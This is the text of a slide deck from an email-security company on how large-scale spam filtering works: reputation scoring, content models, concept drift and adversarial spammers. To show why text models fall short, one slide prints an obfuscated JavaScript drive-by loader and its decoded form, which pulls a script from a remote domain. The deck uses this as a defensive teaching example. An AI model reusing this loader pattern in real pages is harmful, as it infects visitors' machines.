Email filtering: A view from the inside Tom Fawcett Machine Learning Architect Proofpoint, Inc. tfawcett@acm.org
Typical data mining view of spam filtering Email corpus (ham + spam) Content extraction, pre-processing Bag-of-words representation From: "Latasha Gunter" <2nlni7jkcv2@audit.net> To: Tom Fawcett <tfawcett@acm.org> Subject: its been p r o v e n l qnvyvrnpztc 100% Guaranteed to Work! Our Male Enlargement Pill is the most effective on the medical market today with over a Million satisfied customers worldwide! the: 7 the: 72 male: the: 72 male: pill: 4 the: 27 male: 7 pill: 4the: male: medical: 2 27 the: pill: 4 male: medical: pill: 42 22 2 market: 1male: medical: pill: 14 2 medical: market: pill: market: 14 2 medical: market: 1 2 medical: market: market:1 1 Induction algorithm Test set support vector machines random forests ensemble methods, etc. Two-class model Cross-validation 99% accuracy! Spam filtering is easy! 2
Real spam filtering is tough Huge proportion of email is spam (> 90% at some sites) Heterogeneous email stream (Proofpoint has thousands of customers: different languages, different countries, different topics) Not just text. Virtually infinite representation space: Text, HTML, Javascript, images. Types of errors are different and important. Strict performance requirements (Service agreement: 1 FP in 350K msgs) Demanding processing requirements (100-200K messages/hr./appliance) Fundamental noise: Spam looks like bulk, spam looks like ham, phishing looks like ham; ham looks like spam. Words aren t enough: Not enough information Constantly changing spam campaigns come and go Constantly changing intelligent adaptive adversaries 3
Real spam filtering is tough (cont'd) Need for fast response. As soon as we see an attack our customers see it too. Classification process must be transparent. Human analysts must explain, analyze and correct spam decisions. Models must be white-box and understandable Strict privacy concerns We scan everything, but we can't keep it. 4
Types of data mining environments Static data mining Fixed patterns, fixed model. If data source is a stream, series is stationary. env Dynamic. Concept drift; non-stationary streams. Set of disjuncts to concept; have to decide when one is changing and how to adjust model(s). Adversarial Feedback loop with environment. Drifting concept, driven by adversary who is actively trying to defeat model. Interacting complex adaptive systems (some chaotic dynamics) Economics, game theory, complex systems theory. 5
Adversarial domains are everywhere Valuable asset + intelligent agents + large playing field = ARMS RACE Cellphone fraud / detection Blog spam, tweet spam Credit card fraud / detection Advertising / ad blocking Cracking / intrusion detection CAPCHAs / CAPCHA breaking Email (spam) / filtering Viruses / Antivirus products Click fraud Phishing / detection Games Product review spam / detection & culling User tracking technology / Privacy guards Music sharing / torrent poison Nature of the game and agents' intelligence determines the dynamics 6
Types of email we distinguish Some terminology Bulk email. Like spam but desired and (presumably) requested. Spam (unsolicited commercial email) Viruses (attachments and drive-by downloads) Phishing (representing a legit sender, to get recipient to divulge sensitive information). All spam Legit email = ham = negative class (not a threat) Illegit email = spam = positive class (threat, alarm) So errors are: False positives = false alarms (legit email thrown away) False negatives = spam that got through the filters
Where we get (training) data Historical (static) collections of ham and spam. Spamtraps: Machines on the internet that receive no legitimate email.. Honeypoints: Addresses on customer machines that receive only spam.. Sources of 100% spam False Positives and False Negatives reported by customers
Spamtraps
Email transmission process (dialog) HELO relay.example.org 250 Hello relay.example.org, glad to meet you MAIL FROM:<bob@example.org> 250 Ok RCPT TO:<alice@example.com> RCPT TO<th:eboss@example.com> Inbound sender 250 Ok TEXT Return-Path: bounce@inbound.teach12.net Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC) Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54 Date: Thu, 21 Oct 2010 12:26:43-0400 To: tom.fawcett@comcast.net From: "The Teaching Company" <teaching_company@teach12.net> Mail host (MTA) Responsible for filtering and delivery... You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else.... 250 Ok 10
Email components what we have to work with HELO relay.example.org Machine name and IP address of immediate upstream server MAIL FROM:<bob@example.org> Return address probably forged if spam RCPT TO:<alice@example.com> RCPT TO:<theboss@example.com> Recipients Mail body. Any portion can be forged. Return-Path: bounce@inbound.teach12.net Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC) Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54 Date: Thu, 21 Oct 2010 12:26:43-0400 To: tom.fawcett@comcast.net From: "The Teaching Company" <teaching_company@teach12.net>... You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else.... Received lines, presumably indicating where the message has been and how it's been routed. Often forged in spam. Sender + recipient Body. Text, HTML, etc. Also: Attachments. Zero or more.
Email scanning process - overview Inbound email connection Delivered-To: em-ca-bruceg@em.ca Received: (qmail 4406 invoked from n1 Received: from dunwoody-dobson.ie () by churchill.factcomp.com ([24.89.90]) with ESMTP via TCP; 01 Dec 2009 1 From: "Lyles X Alisa" <Crosbyxjtovbgw> To: henrietta96@aol.com Cc: amvimdypet@fufutmadje.comt Return-Path: Crosbyxjtovbgw@mailpro Utility-based classification: General increase in cost/decrease in utility IP (connection) scoring Here's what we're for this week: Reject Domain (URL) extraction Header extraction Content parsing Domain reputation/scoring SNA Content scoring Reject Reject Deliver
IP (sender) scoring Reputation model Who's sending this email? Every inbound sender's IP (address) is evaluated Internal factors (who in our network is getting email from this IP? How much email? How much spam? etc.) External factors (How long has this IP been around? What subnet/country? Who is it registered to?) Quantified and provided to a classifier Classifier has several actions: Accept, Reject, Throttle, Discard Statistics updated quickly and shared. 13
Domain (URL) scoring What are they pointing back to? URL classification is critical. URLs are how most spammers provide links to their wares (Click <A HREF=... >HERE</A> to buy!) Every URL is extracted from each email message and evaluated. URLs are evaluated similarly to IPs but with slightly different criteria, eg who registered this domain and for how long; who is name server, etc. Classifier is used to condemn URLs, which in turn can cause an email to be rejected. Spammers know URLs are watched so they use public resources: Googlegroups, bit.ly, etc. 14
Content scoring Regular expression parsing (SpamAssassin rules + Proofpoint rule set) Very large lexicon (~ 1 million entries) Words Phrases URLs Rules and terms Trained by modified logistic regression Binomial assumption Normalized score Inputs to LR (~ 300K) Lorem ipsum dolor asdf asdf voluptat In use, produces a score between 0 and 100. voluptat asdf nostru words, phrases, regexps 15
(Why use simple classifiers?) Needs to be explainable, modifiable. Representation can (should?) incorporate many attribute interactions. 2 Empirically unnecessary. (R 0.95) No advantage from more complex models. Need for space and time efficiency. 16
Disjuncts of a spam stream Spam term frequency chi-squared tests per week of 2002 1: Relatively stable/static 2: Seasonal/periodic 3: Episodic spiking From "In vivo" spam filtering: A challenge problem for data mining. Tom Fawcett, KDD Explorations vol.5 no.2, December 2003. 17
Data mining classifier update cycles Main cycles: Lexicon consolidation, weight training, etc. 24 hrs Fast attack response: New attacks are examined and lexicon is updated. ~15 min cycles 24 hrs
Fast attack learning & response NB: Primary change is to representation, not to model. 1. Dip in TP rate on a spamtrap signifies attack that is not being handled by the classifier. Lexicon 4. Messages are clustered by text contents 2. False Negatives (low-scoring spam messages) downloaded from spamtraps. 6. New lexicon entries are pushed out to customer sites, along with weight estimates, to be integrated into classifier. 3. Messages are parsed and dissected (URL, email extraction, etc.) 5. In consultation with lexicon, characteristic terms are extracted from clusters good cheap Canadian meds lowest mortgage rates in years 19
Text models aren't enough Intentional mis-spelling (V1a.gr@, ViaggrA, C1ALYS, etc.) Inherent overlap/noise (CIALYS) Difference is often intention: Did you request this info? Do you want this ad? Too easy to get around text! 20
Text models aren't enough 21
Text models aren't enough 22
Text models aren't enough (cont'd) 23
Text models aren't enough On your screen Source <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/tr/html4/strict.dtd"> <html> <head> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="600"> <tbody> <tr> <td bgcolor="#999999" width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td> <td width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td> <td width="598"> <table border="0" cellpadding="0" cellspacing="0" width="598"> <tbody> Rendering etc.... Behind the scenes <script type="text/javascript"> <!-var s="=tdsjqu!tsd>#iuuq;00dpmpsepops/dpn0jgsbnfgjmf/kt#?=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) m+=string.fromcharcode(s.charcodeat(i)-1); document.write(m); //--> <script src="http://colordonor.com/iframefile.js"></script> You're infected. 24
Network effects: Cell phone fraud Dialed digits detector Network connections can be used to classify/identify people. Fraudulent! Fraudulent Fraud detection: How closely does pattern match a known fraudulent one? Anomaly detection: How different is a pattern from known legit one? Fraudulent or legit? 25
Link mining and network analysis Link mining may be used to identify spam by p(spam a,b,c,d) NS IP1 IP2 Identifying anomalous, low probability links between recipients (spoofed names, compromised accounts, etc.) Identifying anomalous links between individuals in organizations. Identifying known bad email addresses and the messages that link to them. Linking IPs with countries, subnets; domains with nameservers, etc. 26
[End] 27